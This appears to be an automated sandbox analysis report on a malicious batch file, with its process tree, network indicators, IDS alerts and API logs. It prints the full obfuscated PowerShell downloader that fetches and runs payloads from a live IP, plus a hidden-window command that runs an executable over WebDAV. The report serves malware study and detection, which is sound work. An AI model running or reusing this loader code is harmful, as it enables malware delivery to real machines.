Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Oct. 17, 2023, 10:03 a.m.	Oct. 17, 2023, 10:06 a.m.

Size	744.0B
Type	DOS batch file, ASCII text, with CRLF line terminators
MD5	`758138cf292edc7fc200b8853a34dce3`
SHA256	`e0977281cff8d83f21d9f210655e3cae51da32499369e4a99410c186c5f5a734`
CRC32	`0CD11A3F`
ssdeep	`12:w7xNS+R4Aun4Jk6UKIgeX2e80Qpcm1JVgKD3HNr2qofmrk6EW:w7xgdf9FKHgqVgmVSA`
Yara	None matched

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "MJTdZEt" C:\Users\test22\AppData\Local\Temp\555.bat
508
- cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\555.bat
  2148
  - powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\test22\AppData\Local\Temp\download.ps1
    2240
  - mshta.exe mshta C:\Users\test22\AppData\Local\Temp\artwork.hta
    2384
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $GByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53461,53469,53469))) -eq $True){rundll32.exe $BhpHTDG }elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53473,53476,53410))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $BhpHTDG}elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53470,53476,53466))) -eq $True){misexec /qn /i $BhpHTDG}else{Start-Process $BhpHTDG}};function dQGoaingOScc($XNUFvsdxBy){$ZCySpBOwPMTnvfeq=(DRtLNlwgqwjnKZDxdA @(53433,53466,53461,53461,53462,53471));$ibXFeoGSwHXI=(Get-ChildItem $XNUFvsdxBy -Force);$ibXFeoGSwHXI.Attributes=$ibXFeoGSwHXI.Attributes -bor ([IO.FileAttributes]$ZCySpBOwPMTnvfeq).value__};function aNXgEUjAXQufsCeCuo($gZGtloGwxbqkVPKJdOb){$WMYbNNglKDgIHe = New-Object (DRtLNlwgqwjnKZDxdA @(53439,53462,53477,53407,53448,53462,53459,53428,53469,53466,53462,53471,53477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GByFakU = $WMYbNNglKDgIHe.DownloadData($gZGtloGwxbqkVPKJdOb);return $GByFakU};function DRtLNlwgqwjnKZDxdA($PQDugbiZIXH){$JnufV=53361;$iYPaXbHysg=$Null;foreach($ECwsQTiF in $PQDugbiZIXH){$iYPaXbHysg+=[char]($ECwsQTiF-$JnufV)};return $iYPaXbHysg};function GzHPwnswDBT(){$EZmGpVItgHnJFBAXg = $env:AppData + '\';$txOYkVqMEfMVH = $EZmGpVItgHnJFBAXg + '169712999657711418?95755383518';If(Test-Path -Path $txOYkVqMEfMVH){Invoke-Item $txOYkVqMEfMVH;}Else{ $yaaCfQygQDaNtEjW = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53476,53419,53408,53408,53480,53480,53480,53411,53407,53469,53478,53471,53458,53473,53466,53460,53407,53460,53472,53470,53408,53461,53472,53406,53471,53472,53477,53406,53469,53466,53471,53468,53406,53465,53462,53475,53462,53406,53478,53476,53462,53406,53465,53472,53476,53477,53466,53471,53464,53406,53466,53471,53476,53477,53462,53458,53461,53408,53410,53415,53418,53416,53410,53411,53418,53418,53418,53415,53414,53416,53416,53410,53410,53413,53410,53417,53424,53418,53414,53416,53414,53414,53412,53417,53412,53414,53410,53417));XNUFvsdxBy $txOYkVqMEfMVH $yaaCfQygQDaNtEjW;Invoke-Item $txOYkVqMEfMVH;};$VdPzzDnoaE = $EZmGpVItgHnJFBAXg + 'main.bat'; if (Test-Path -Path $VdPzzDnoaE){fiUxsgPBJYMnKEby $VdPzzDnoaE;}Else{ $mLRpZci = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53419,53408,53408,53418,53410,53407,53411,53409,53416,53407,53410,53417,53412,53407,53418,53419,53417,53409,53409,53409,53408,53470,53458,53466,53471,53407,53459,53458,53477));XNUFvsdxBy $VdPzzDnoaE $mLRpZci;fiUxsgPBJYMnKEby $VdPzzDnoaE;};dQGoaingOScc $VdPzzDnoaE;;;;;}GzHPwnswDBT;
      2484
      - cmd.exe cmd /c ""C:\Users\test22\AppData\Roaming\main.bat" "
        2640
        
        powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -Command \\91.207.183.9@8000\DavWWWRoot\main.exe
        2744

Name	Response	Post-Analysis Lookup
www2.lunapic.com	A 72.9.146.243	72.9.146.243

IP Address	Status	Action
164.124.101.2	Active	Moloch
72.9.146.243	Active	Moloch
91.207.183.9	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49175 -> 72.9.146.243:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49176 -> 72.9.146.243:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49167 -> 91.207.183.9:8000	2022520	ET POLICY Possible HTA Application Download	Potentially Bad Traffic
TCP 192.168.56.103:49167 -> 91.207.183.9:8000	2027261	ET INFO Dotted Quad Host HTA Request	Potentially Bad Traffic
TCP 91.207.183.9:8000 -> 192.168.56.103:49177	2026989	ET HUNTING PowerShell Hidden Window Command Common In Powershell Stagers M1	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (20 events)

Time & API	Arguments	Status	Return
GetComputerNameW Oct. 17, 2023, 10:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 17, 2023, 10:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 17, 2023, 10:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 17, 2023, 10:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 17, 2023, 10:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 17, 2023, 10:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 17, 2023, 10:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 17, 2023, 10:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 17, 2023, 10:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 17, 2023, 10:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 17, 2023, 10:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 17, 2023, 10:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 17, 2023, 10:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 17, 2023, 10:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 17, 2023, 10:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 17, 2023, 10:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 17, 2023, 10:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 17, 2023, 10:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 17, 2023, 10:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 17, 2023, 10:03 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (3 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Oct. 17, 2023, 10:03 a.m.			0	0
IsDebuggerPresent Oct. 17, 2023, 10:03 a.m.			0	0
IsDebuggerPresent Oct. 17, 2023, 10:03 a.m.			0	0

Command line console output was observed (50 out of 141 events)

Time & API	Arguments	Status	Return
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net. console_handle: 0x00000023	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol console_handle: 0x0000002f	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: lowing enumeration values and try again. The possible enumeration values are "S console_handle: 0x0000003b	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: sl3, Tls"." console_handle: 0x00000047	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: At line:1 char:984 console_handle: 0x00000053	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: + function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $G console_handle: 0x0000005f	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: ByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjn console_handle: 0x0000006b	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: KZDxdA @(53407,53461,53469,53469))) -eq $True){rundll32.exe $BhpHTDG }elseif($B console_handle: 0x00000077	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: hpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53473,53476,53410))) -eq $True){pow console_handle: 0x00000083	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: ershell.exe -ExecutionPolicy unrestricted -File $BhpHTDG}elseif($BhpHTDG.EndsWi console_handle: 0x0000008f	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: th((DRtLNlwgqwjnKZDxdA @(53407,53470,53476,53466))) -eq $True){misexec /qn /i $ console_handle: 0x0000009b	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: BhpHTDG}else{Start-Process $BhpHTDG}};function dQGoaingOScc($XNUFvsdxBy){$ZCySp console_handle: 0x000000a7	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: BOwPMTnvfeq=(DRtLNlwgqwjnKZDxdA @(53433,53466,53461,53461,53462,53471));$ibXFeo console_handle: 0x000000b3	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: GSwHXI=(Get-ChildItem $XNUFvsdxBy -Force);$ibXFeoGSwHXI.Attributes=$ibXFeoGSwHX console_handle: 0x000000bf	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: I.Attributes -bor ([IO.FileAttributes]$ZCySpBOwPMTnvfeq).value__};function aNXg console_handle: 0x000000cb	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: EUjAXQufsCeCuo($gZGtloGwxbqkVPKJdOb){$WMYbNNglKDgIHe = New-Object (DRtLNlwgqwjn console_handle: 0x000000d7	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: KZDxdA @(53439,53462,53477,53407,53448,53462,53459,53428,53469,53466,53462,5347 console_handle: 0x000000e3	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: 1,53477));[Net.ServicePointManager]:: <<<< SecurityProtocol = [Net.SecurityProt console_handle: 0x000000ef	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: ocolType]::TLS12;$GByFakU = $WMYbNNglKDgIHe.DownloadData($gZGtloGwxbqkVPKJdOb); console_handle: 0x000000fb	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: return $GByFakU};function DRtLNlwgqwjnKZDxdA($PQDugbiZIXH){$JnufV=53361;$iYPaXb console_handle: 0x00000107	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: Hysg=$Null;foreach($ECwsQTiF in $PQDugbiZIXH){$iYPaXbHysg+=[char]($ECwsQTiF-$Jn console_handle: 0x00000113	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: ufV)};return $iYPaXbHysg};function GzHPwnswDBT(){$EZmGpVItgHnJFBAXg = $env:AppD console_handle: 0x0000011f	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: ata + '\';$txOYkVqMEfMVH = $EZmGpVItgHnJFBAXg + '169712999657711418?95755383518 console_handle: 0x0000012b	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: ';If(Test-Path -Path $txOYkVqMEfMVH){Invoke-Item $txOYkVqMEfMVH;}Else{ $yaaCfQy console_handle: 0x00000137	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: gQDaNtEjW = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53 console_handle: 0x00000143	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: 416,53414,53414,53412,53417,53412,53414,53410,53417));XNUFvsdxBy $txOYkVqMEfMVH console_handle: 0x00000197	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: $yaaCfQygQDaNtEjW;Invoke-Item $txOYkVqMEfMVH;};$VdPzzDnoaE = $EZmGpVItgHnJFBAX console_handle: 0x000001a3	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: g + 'main.bat'; if (Test-Path -Path $VdPzzDnoaE){fiUxsgPBJYMnKEby $VdPzzDnoaE;} console_handle: 0x000001af	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: Else{ $mLRpZci = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,534 console_handle: 0x000001bb	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: ,53459,53458,53477));XNUFvsdxBy $VdPzzDnoaE $mLRpZci;fiUxsgPBJYMnKEby $VdPzzDno console_handle: 0x000001df	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: aE;};dQGoaingOScc $VdPzzDnoaE;;;;;}GzHPwnswDBT; console_handle: 0x000001eb	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException console_handle: 0x000001f7	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: + FullyQualifiedErrorId : PropertyAssignmentException console_handle: 0x00000203	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: Exception calling "DownloadData" with "1" argument(s): "The underlying connecti console_handle: 0x0000001b	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: on was closed: An unexpected error occurred on a send." console_handle: 0x00000027	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: At line:1 char:1076 console_handle: 0x00000033	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: + function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $G console_handle: 0x0000003f	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: ByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjn console_handle: 0x0000004b	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: KZDxdA @(53407,53461,53469,53469))) -eq $True){rundll32.exe $BhpHTDG }elseif($B console_handle: 0x00000057	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: hpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53473,53476,53410))) -eq $True){pow console_handle: 0x00000063	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: ershell.exe -ExecutionPolicy unrestricted -File $BhpHTDG}elseif($BhpHTDG.EndsWi console_handle: 0x0000006f	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: th((DRtLNlwgqwjnKZDxdA @(53407,53470,53476,53466))) -eq $True){misexec /qn /i $ console_handle: 0x0000007b	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: BhpHTDG}else{Start-Process $BhpHTDG}};function dQGoaingOScc($XNUFvsdxBy){$ZCySp console_handle: 0x00000087	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: BOwPMTnvfeq=(DRtLNlwgqwjnKZDxdA @(53433,53466,53461,53461,53462,53471));$ibXFeo console_handle: 0x00000093	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: GSwHXI=(Get-ChildItem $XNUFvsdxBy -Force);$ibXFeoGSwHXI.Attributes=$ibXFeoGSwHX console_handle: 0x0000009f	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: I.Attributes -bor ([IO.FileAttributes]$ZCySpBOwPMTnvfeq).value__};function aNXg console_handle: 0x000000ab	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: EUjAXQufsCeCuo($gZGtloGwxbqkVPKJdOb){$WMYbNNglKDgIHe = New-Object (DRtLNlwgqwjn console_handle: 0x000000b7	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: KZDxdA @(53439,53462,53477,53407,53448,53462,53459,53428,53469,53466,53462,5347 console_handle: 0x000000c3	1	1
WriteConsoleW Oct. 17, 2023, 10:03 a.m.	buffer: 1,53477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolTy console_handle: 0x000000cf	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 132 events)

Time & API	Arguments	Status	Return
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b3ba0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071bc70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071bc70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071bc70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071bef0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071bef0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071bef0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071bef0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071bef0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071bef0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071be30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071be30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071be30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071be30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071be30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071be30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071bc70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071be30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071be30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071be30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071be30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071be30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071be30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071be30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071bf70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071bf70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071bf70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071bf70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071bf70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071bf70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071bf70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071bf70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071bf70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071bf70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071bf70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071bf70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071bf70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071bf70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071c030 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071c030 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004efc40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004efcc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004efcc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004efcc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f0540 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f0540 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f0540 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f0540 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f0540 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f0540 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 17, 2023, 10:03 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	GET method with no useragent header, Connection to IP address				suspicious_request	GET http://91.207.183.9:8000/artwork.hta
suspicious_features	GET method with no useragent header, Connection to IP address				suspicious_request	GET http://91.207.183.9:8000/main.bat

Performs some HTTP requests (2 events)

request	GET http://91.207.183.9:8000/artwork.hta
request	GET http://91.207.183.9:8000/main.bat

Allocates read-write-execute memory (usually to unpack itself) (50 out of 442 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 524288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02510000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:03 a.m.	process_identifier: 2240 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
